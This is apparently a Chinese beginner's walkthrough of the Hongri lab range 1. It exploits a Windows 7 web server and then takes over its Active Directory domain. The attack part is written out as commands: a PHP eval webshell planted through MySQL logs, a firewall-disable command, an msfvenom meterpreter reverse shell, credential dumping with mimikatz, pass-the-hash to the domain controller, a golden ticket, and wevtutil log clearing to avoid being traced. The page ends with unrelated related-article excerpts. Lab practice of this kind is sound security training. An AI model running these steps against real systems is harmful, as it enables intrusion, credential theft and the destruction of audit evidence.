红日靶场-1详细解析(适合小白版)

devtools/2024/11/22 21:03:56/

红日靶场涉及内网知识,和前期靶场不太一样,前期靶场大部分都是单个靶机获得root权限,而这一次更综合,后期也会继续学习内网知识,继续打红日靶场,提高自己的综合技能。

环境搭建

首先本题的网络拓扑结构如下所示,三台虚拟机的初始密码都是hongrisec@2019

img

这里我们的Web服务器是win7虚拟机,其他两台虚拟机是域内成员,一台作为我们的DC,首先介绍一下什么是工作组和域。

工作组:
将不同计算机按功能分别列入不同的组内,在一个大的单位内,可能有成百上千台电脑互相连接组成局域网,它们都会列在“网络(网上邻居)”内,如果这些电脑不分组,可想而知有多么混乱,要找一台电脑很困难。为了解决这一问题,就有了“工作组”这个概念,将不同的电脑一般按功能(或部门)分别列入不同的工作组中,如技术部的电脑都列入“技术部”工作组中,行政部的电脑都列入“行政部”工作组中。你要访问某个部门的资源,就在“网络”里找到那个部门的工作组名,双击就可以看到那个部门的所有电脑了。相比不分组的情况就有序的多了,尤其是对于大型局域网络来说。
域:
域是一个有安全边界的计算机集合(安全边界的意思即一个域中的用户无法访问另外一个域中的资源),相比工作组而言,它有一个更加严格的安全管理机制,如果想访问域内资源,必须拥有一个合法的身份登录到该域中,你的权限取决于你在该域中的用户身份。
DC:
域内管理者,活动目录的数据库(包括用户的账号信息)是存储在DC中的,一旦DC瘫痪,其他用户就不能登录该域,内网中最重要的也是拿到域内DC控制权

这里我们设置网络VMnet1和VMnet8,将VMnet1作为内网,VMnet8作为外网,其中需要注意的是,VMnet1的子网地址必须是192.168.52.0,否则后面win7的web服务无法开启

image-20241103134521469

配置win7 web服务网络

从网络拓扑图可知,需要模拟内网和外网两个网段,Win7虚拟机相当于网关服务器,所以需要两张网卡,如下所示

image-20241103134847041

我们试着ping一下我们的主机,如果可以ping通,说明我们成功连接上了外网,如下所示

image-20241103135050080

同时记得把虚拟机的防火墙关闭,否则我们的攻击机ping不通我们的win7虚拟机

ping一下DC域控,能ping通说明内网设置也成功

image-20241103140146545

配置Winserver 2008(DC)

我们直接将域控主机配置VMnet1网卡,如下所示

image-20241103135703528

配置win2k3网络(域成员)

域内主机win2003的网卡配置和DC配置一致,选择VMnet1网卡即可,与外网不连通

image-20241103140036762

ip配置如下:

Windows11攻击机:192.168.20.130
Windows7(web服务器):192.168.20.132、192.168.52.143
Windows2008(DC):192.168.52.138
Win2k3:192.168.52.141

接着我们开启win7上的web服务,我们打开phpstudy,启动服务

image-20241103141204446

我们试着访问一下

image-20241103141313538

可以正常访问到PHP探针,至此环境全部搭建完毕,接下来我们可以愉快的进行渗透拿权限了。

外网边界探测

我们首先探测一下外网主机开放的端口,我们使用nmap进行扫描,如下所示,nmap -T4 -sV -p- -A 192.168.20.132

image-20241103154814975

我们发现开放了803306445以及139端口,这就提醒我们可以从3个方向入手,分别是web网页、mysql数据库以及SMB服务,我们首先试试SMB服务,看看有没有信息泄露,我们使用smbclient进行查看,但是并没有什么有价值的信息,我们还是从80端口出发,先扫一扫有没有后门目录

python39 dirsearch.py -u http://192.168.20.132/

image-20241103161614214

我们发现存在phpmyadmin后台,即著名的mysql数据库管理后台,我们尝试访问一下,我们先尝试一下弱密码root:root,发现成功登陆进去了,我们先尝试看看有没有nday漏洞给我们利用,先看版本号

image-20241103162318935

版本号为5.5.53,我们尝试去搜索该版本的历史漏洞

image-20241103162846922

并没有历史漏洞,所以我们得换一种思路去getshell,我们通过搜寻,可以知道phpmyadmin可以利用mysql日志文件写入shell进行getshell,我们尝试一下这种做法,以前还从来没这么做过

phpmyadmin getshell

首先我们开启mysql日志,在运行框中运行下面的语句

set global general_log='on'

image-20241103163916413

查看当前mysql路径

select @@basedir;

6af5c5a34243ce5ab3df5bdad58598b5

接下来设置木马写入的路径,如下所示

set global general_log_file ="C:/phpStudy/WWW/shell.php"

image-20241103164440445

接下来我们写入一句话木马,如下所示

select "<?php eval($_POST['attack'])?>"

image-20241103164922719

接下来我们直接访问shell.php即可

image-20241103165056709

我们尝试蚁剑连接,获取虚拟终端,如下所示

image-20241103170002989

我们执行ipconfig,发现了内网网段192.168.52.0/24

后渗透

首先先把主机防火墙关闭,方便我们进行进一步操作

netsh advfirewall set allprofiles state off

image-20241103171605188

接下来我们运行msf,使用msf上线主机,如下所示

msfvenom -p windows/meterpreter_reverse_tcp LHOST=192.168.20.138  LPORT=4444 -f exe -o shell.exe

我们将shell.exe通过蚁剑上传到靶机上去

image-20241103172925586

接着我们在kali上开启监听模式,持续监听连接

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 0.0.0.0

我们用蚁剑运行exe文件,如下所示

image-20241103174345423

我们的kali成功上线windows7,第一步我们进行权限维持

权限维持

进行权限维持就是要将进程进行迁移,即将我们的shell.exe的进程附加在系统进程上

migrate 1944

image-20241103175323881

收集域内信息

内网信息收集的主要目的就是查找域控以及域控内的其他主机

net view                 # 查看局域网内其他主机名
net config Workstation   # 查看计算机名、全名、用户名、系统版本、工作站、域、登录域
net user                 # 查看本机用户列表
net user /domain         # 查看域用户
net localgroup administrators # 查看本地管理员组(通常会有域用户)
net view /domain         # 查看有几个域
net user 用户名 /domain   # 获取指定域用户的信息
net group /domain        # 查看域里面的工作组,查看把用户分了多少组(只能在域控上操作)
net group 组名 /domain    # 查看域中某工作组
net group "domain admins" /domain  # 查看域管理员的名字
net group "domain computers" /domain  # 查看域中的其他主机名
net group "doamin controllers" /domain  # 查看域控制器主机名(可能有多台)

首先判断是否存在域,我们使用ipconfig /all查看DNS服务器,我们发现存在域god.org

image-20241103184701843

接着我们使用net view /domain查看有几个域

image-20241103184916130

我们发现只有唯一一个域,接下来我们查看域控主机名,我们使用net group "doamin controllers" /domain进行查询即可,我们可以查询到域控为owa

我们接着查询所有域内主机,如下所示net view

image-20241103190141105

接着我们查询域内IP,使用arp -a进行查询

06ac1b56a8e56435c3efedb8112348ed

为了确定哪个是域控主机IP,我们尝试去ping一下域名ping owa.god.org

image-20241103190353925

至此我们域内信息收集完毕

域名为 god
域中有三台主机:
stu1.god.org   
root-tvi862ubeh.god.org   192.168.52.141
owa.god.org   192.168.52.138 域控主机

横向渗透

首先我们要配置代理,使用proxychains进行代理配置,否则我们的kali机无法扫描到内网的机器

run post/multi/manage/autoroute
设置proxychains代理
use auxiliary/server/socks_proxy
set srvport 1080
set srvhost 127.0.0.1
run

之后我们在我们的配置文件/etc/proxychains4.conf加上代理,如下所示

image-20241103194239719

我们直接挂代理扫域控主机的端口

proxychains nmap -Pn -sT 192.168.52.138

Snipaste_2021-07-20_22-00-39

我们发现开放了445端口,我们尝试使用永恒之蓝进行探测,但是没有成功,后来上网查询发现哈希传递可以拿下域控,利用永恒之蓝拿shell成功案例太少了

image-20241103205751996

哈希传递攻击拿下域控

哈希传递攻击:
在 kerberos、NTLM 认证过程的关键,首先就是基于用户密码 Hash 的加密,所以在域渗透中,无法破解用户密码 Hash 的情况下,也可以直接利用 Hash 来完成认证,达到攻击的目的,这就是 hash 传递攻击(Pass The Hash,简称 PTH)。如果内网主机的本地管理员账户密码相同,那么可以通过 PTH 远程登录到任意一台主机。
攻击流程:
1. 获得一台域控主机的权限,Dump内存获得该主机获得该主机的用户密码Hash值;
2. 通过哈希传递攻击尝试登录其他主机
3. 继续收集哈希并尝试远程登录,知道获得域管理员Hash,登录域控,控制整个域

首先我们使用hashdump获取哈希值,如下所示

image-20241103220640788

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
liukaifeng01:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

但是这只是用户密码的一个hash值,我们在msf里加载mimikatz模块,之后使用credentials获取哈希值和密码,但是要注意的是,这里得首先进行进程迁移,因为kiwi模块不能在x64上运行,我们迁移到x86进程即可

image-20241103222448140

所以哈希值为

38131169c2d3664b0e8cc78be9175e3c

我们使用以下模块进行哈希传递

auxiliary/admin/smb/psexec_command   #在目标机器上执行系统命令
exploit/windows/smb/psexec           #用psexec执行系统命令
exploit/windows/smb/psexec_psh       #使用powershell作为payload

以exploit/windows/smb/psexec模块进行哈希传递攻击

use exploit/windows/smb/psexec
set rhosts 192.168.52.138
set smbuser administrator
set smbpass 00000000000000000000000000000000:38131169c2d3664b0e8cc78be9175e3c
set smbdomain god
run

但是我们这里还是失败了,我们选择换一种方式,我们试着用cs进行上线,cs操作起来会更方便一点

CS上线

我们这里用CS生成一个exe文件,上传到我们的web靶机上去,如下所示,首先我们先在CS上创建一个名为borgeous的监听,端口设置为4444

image-20241117115428130

之后我们的exe监听器选中borgeous即可,如下所示

image-20241117115445457

我们生成后将这个exe文件导出,通过蚁剑上传到我们的win7靶机上即可,运行后我们可以在cs上看到我们的主机已经上线了

image-20241117115710260

跑着跑着环境又崩了,我们只能重启重新运行,内网是这样的,虚拟机一开多环境就容易崩,CS如果老是闪退的话,多重启几次就好了,也没有啥好办法,反正我是要崩溃了

我们先用cs抓取一下明文密码,如下所示

image-20241117135816129

我们对域控主机进行端口扫描,发现开放了445端口,如下所示

6b1962b2fdbf8b1b143f9ea2a58aec84

我们可以创建SMB监听隧道,首先我们新增一个SMB监听器,如下所示

image-20241117140915686

之后我们横向移动到域控主机上去,我们使用哈希传递进行攻击,如下所示

image-20241117141536085

我们这里选择system权限的session进行哈希传递,其他的可能权限不够

image-20241117142210106

我们这里成功进行哈希传递拿到域控,我们接着要关闭受控主机防火墙,关防火墙是个好习惯

黄金票据维持权限

黄金票据是指能够绕过认证授权(Authentication and Authorization)机制并获得所需权限的票据。这种票据可以被攻击者收集和利用,从而从系统内部获取高权限,甚至完全控制系统。

我们首先抓取哈希以及明文密码,如下所示

4f8a08723e1ef0b73aaf732f43a544a6

6cf1c993c92f1e075562b9ebdf8d19fe

最重要的就是获取SID值和krbtgt票据来创建我们的黄金票据,如下所示

image-20241117143706987

这样我们成功创建了属于我们的黄金票据,到此我们的渗透结束

痕迹清理

shell wevtutil cl security    //清理安全日志
shell wevtutil cl system        //清理系统日志
shell wevtutil cl application        //清理应用程序日志
shell wevtutil cl "windows powershell"    //清除power shell日志
shell wevtutil cl Setup     //清除(cl)事件日志中的 "Setup" 事件。

我们在渗透完之后一定要进行痕迹清理,以防止自己被溯源,我们执行以上几条命令可以帮我们进行痕迹清理

image-20241117144410759

至此我们的靶场到此全部破解

心得体验

这是我第一次打内网靶场,在打这个靶场之前,我的前置知识也不是很多,可能只大概知道一些内网的概念,所以在打的过程中还是比较坐牢的,一个是工具用不熟练,msf和cs我都捣鼓了很久才慢慢摸到一点门道,总之还是得多练,多做题,才能越来越熟练,前段时间看wp都看得头痛,现在也慢慢能摸索出一点门道了,后续还会再学一点内网的相关课程,提高自己的技能


http://www.ppmy.cn/devtools/136120.html

相关文章

VMware Workstation 17.6.1

概述 目前 VMware Workstation Pro 发布了最新版 v17.6.1&#xff1a; 本月11号官宣&#xff1a;针对所有人免费提供&#xff0c;包括商业、教育和个人用户。 使用说明 软件安装 获取安装包后&#xff0c;双击默认安装即可&#xff1a; 一路单击下一步按钮&#xff1a; 等待…

windows下编译ffmpeg4.4版本

最近在做一个利用ffmpeg库播放rtsp流的一个项目&#xff0c;需要自己编译ffmpeg源码&#xff1b;记录一下编译源码的过程&#xff0c;仅供参考&#xff1b; 目标&#xff1a; 开发环境&#xff1a;windows10系统&#xff1b; ffmpeg:ffmpeg4.4版本&#xff0c;https://downlo…

图解 TCP 四次挥手|深度解析|为什么是四次|为什么要等2MSL

写在前面 今天我们来图解一下TCP的四次挥手、深度解析为什么是四次&#xff1f; 上一片文章我们已经介绍了TCP的三次握手 解析四次挥手 数据传输完毕之后&#xff0c;通信的双方都可释放连接。现在客户端A和服务端B都处于ESTABLISHED状态。 第一次挥手 客户端A的应用进…

17. Linux下在虚拟环境中安装CUDA和CUDNN

这个专栏记录我学习/科研过程中遇到的一些小问题以及解决方案&#xff0c;一些问题可能比较蠢请见谅。自用&#xff0c;仅供参考。 ------------------------------------------------------------------------------------ Linux下在虚拟环境中安装CUDA和CUDNN 目标&#xf…

【MyBatisPlus·最新教程】包含多个改造案例,常用注解、条件构造器、代码生成、静态工具、类型处理器、分页插件、自动填充字段

文章目录 一、MyBatis-Plus简介二、快速入门1、环境准备2、将mybatis项目改造成mybatis-plus项目&#xff08;1&#xff09;引入MybatisPlus依赖&#xff0c;代替MyBatis依赖&#xff08;2&#xff09;配置Mapper包扫描路径&#xff08;3&#xff09;定义Mapper接口并继承BaseM…

React渲染流程与更新diff算法

React 的渲染流程从虚拟 DOM 树的生成到真实 DOM 的挂载和更新是一个层层递进的过程。以下是详细的解析&#xff1a; 渲染流程概述 React 的渲染流程可以分为两个阶段&#xff1a; 初次渲染&#xff08;Mounting&#xff09;&#xff1a; 将虚拟 DOM 树转换为真实 DOM&#x…

「Chromeg谷歌浏览器/Edge浏览器」篡改猴Tempermongkey插件的安装与使用

1. 谷歌浏览器安装及使用流程 1.1 准备篡改猴扩展程序包。 因为谷歌浏览器的扩展商城打不开&#xff0c;所以需要准备一个篡改猴压缩包。 其他浏览器只需打开扩展商城搜索篡改猴即可。 没有压缩包的可以进我主页下载。 也可直接点击下载&#xff1a;Chrome浏览器篡改猴(油猴…

应用系统开发(12) Zync中实现数字相敏检波

在 Xilinx Zynq 系列(如 Zynq-7000 或 Zynq UltraScale+)中实现数字相敏检波(DSP,Digital Synchronous Detection)可以通过硬件(PL部分,FPGA逻辑)和软件(PS部分,ARM Cortex-A 处理器)的协同工作来实现。以下是一个详细的设计方法,包括基本原理和 Zynq 的实现步骤。…